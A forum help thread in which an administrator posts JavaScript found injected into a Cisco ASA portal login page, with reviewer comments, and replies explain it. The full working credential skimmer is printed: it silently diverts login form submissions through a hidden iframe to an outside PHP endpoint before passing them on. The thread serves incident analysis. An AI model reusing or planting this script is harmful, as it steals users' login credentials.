Help! Javascript on my firewall

Hello All

We run a Cisco ASA with a web portal on it. Yesterday I noticed the login page was running this script.

Code:
        // Reviewer annotation: code tokens are unchanged; only line breaks and comments were added.
        // What the listing does: it builds a small helper object (`xss`) and then calls
        // xss.xform() on the form with id 'unicorn_form', so that a submission of that form is
        // first sent to a third-party URL inside a hidden iframe and then re-submitted to the
        // form's original action. Anything typed into the form while this script was present
        // should be treated as disclosed to that URL.
        // Indicators visible in this code: a hidden <iframe> whose name is `_<digits>_` appended
        // to the <html> element, the form's `action`/`target` being rewritten, and extra
        // `old_action`/`old_target` properties on the form element.
        // NOTE(review): the listing shows only the client-side script; how it came to be served
        // by the login page is not visible here. Password resets presumably need to be paired
        // with finding and removing that modification - confirm on the device.
        var xss = function(){
            // Self-description of the toolkit; the author field is empty.
            var x = {
                'name':'xss.js',
                'version':'0.2.2',
                'author':''
            };
            // Shorthand for document.getElementById. Not called in this listing.
            x.x=function(id){return document.getElementById(id)};
            // Evaluates a string as a parenthesised expression via eval(); any exception is
            // swallowed and '' is returned. Not called in this listing.
            x.e=function(_){try{return eval('('+_+')')}catch(e){return''}};
            // Browser-sniffing flags.
            //   i: false when self.ActiveXObject is absent; otherwise a number obtained by
            //      probing IE conditional comments with increasing version numbers from 6.
            //   c/f/o/s: presence checks on self.chrome, self.mozPaintCount, self.opera and
            //      self.WebKitPoint (presumably Chrome, Firefox, Opera and Safari).
            x.i={
                i:!!self.ActiveXObject&&(function(){
                    for(var v=6,s=document.createElement('s');
                        s.innerHTML='<![if gt IE '+(v++)+']><i></i><![endif]-->',
                        s.getElementsByTagName('i')[0];);
                    return v;
                }()),
                c:!!self.chrome,
                f:self.mozPaintCount>-1,
                o:!!self.opera,
                s:!self.chrome&&!!self.WebKitPoint
            }
            // Integer in 0..99999 from Math.random(); used below to name the iframe.
            x.rdm=function(){return~~(Math.random()*1e5)};
            // Alias for encodeURIComponent. Not called in this listing.
            x.ec=encodeURIComponent;
            // Returns the <html> element, writing one with document.write() if none is found.
            x.html=function(){
                return document.getElementsByTagName('html')[0]
                        ||document.write('<html>')
                        ||document.getElementsByTagName('html')[0];
            };
            // Detaches element e from its parent.
            x.kill=function(e){
                e.parentElement.removeChild(e);
            };
            // Event binding: addEventListener where available, otherwise attachEvent.
            x.bind=function(e,name,fn){
                e.addEventListener?e.addEventListener(name,fn,false):e.attachEvent("on"+name,fn);
            };
            // Runs fn when the document is ready: DOMContentLoaded when x.i.i is falsy, otherwise
            // polls document.body.doScroll('left') every 4 ms until it stops throwing.
            // Not called in this listing.
            x.ready=function(fn){
                if(!x.i.i){
                    x.bind(document,'DOMContentLoaded',fn);
                }else{
                    var s = setInterval(function(){
                        try{
                            document.body.doScroll('left');
                            clearInterval(s);
                            fn();
                        }catch(e){}
                    },4);
                }
            }
            // Compares protocol + hostname + port (port defaulting to 80) of `url` with those of
            // the current location, using a temporary hidden <a> that x.dom removes after one
            // second. Not called in this listing.
            x.o=function(url){
                var link = x.dom('<a href="'+encodeURI(url)+'">',1);
                return link.protocol+link.hostname+':'+(link.port||80)==location.protocol+location.hostname+':'+(location.port||80);
            };
            // Parses `html` through innerHTML, takes the first resulting element, hides it with
            // display:none and appends it to the <html> element. If gcsec coerces to a positive
            // integer, the element is removed again after gcsec seconds. Returns the element.
            x.dom=function(html,gcsec){
                var tmp = document.createElement('span');
                tmp.innerHTML=html;
                var e = tmp.children[0];
                e.style.display='none';
                x.html().appendChild(e);
                gcsec>>0>0&&setTimeout(function(){
                    x.kill(e);
                },gcsec*1000);
                return e;
            };
            // Form interception.
            x.xform=function(form,action){
                // Remember the form's real action and target on the element itself, then point
                // the action at the supplied URL.
                form.old_action=form.action,form.old_target=form.target,form.action=action;
                // Hidden iframe with a randomised name; it becomes the form's target, so the
                // response to the diverted submission is not shown in the visible page.
                var iframe = x.dom('<iframe name=_'+x.rdm()+'_>');
                form.target=iframe.name;
                // After 30 ms, attach a load handler to the iframe. When it fires, the original
                // action and target are restored, any onsubmit handler is cleared, and the form
                // is submitted again, this time to its original destination.
                setTimeout(function(){
                    x.bind(iframe,'load',function(){
                        form.action=form.old_action,form.target=form.old_target,form.onsubmit=null,form.submit();
                    });
                },30);
            };
            return x;
        }();
        // The only call in the listing: applies the interception to the element with id
        // 'unicorn_form' (presumably the portal's login form - confirm against the page markup)
        // and names the third-party URL that receives the diverted submission.
        xss.xform(document.getElementById('unicorn_form'),"https://www.rusi.org.au/documents/biodata/x.php");
The code is located at http://www.rusi.org.au/documents/biodata/1.js. I'm not sure if the site is just a front for something sinister or what.
 
By the looks of it, it's submitting the form data to https://www.rusi.org.au/documents/biodata/x.php from an iframe.

Using an iframe to submit lets it do so without refreshing the page, sort of like AJAX.

If the website in question is in fact legitimate, the attackers have most likely shelled its server to upload their scripts.

Thanks for your help, I thought the worst. Now to reset all passwords. Joy
 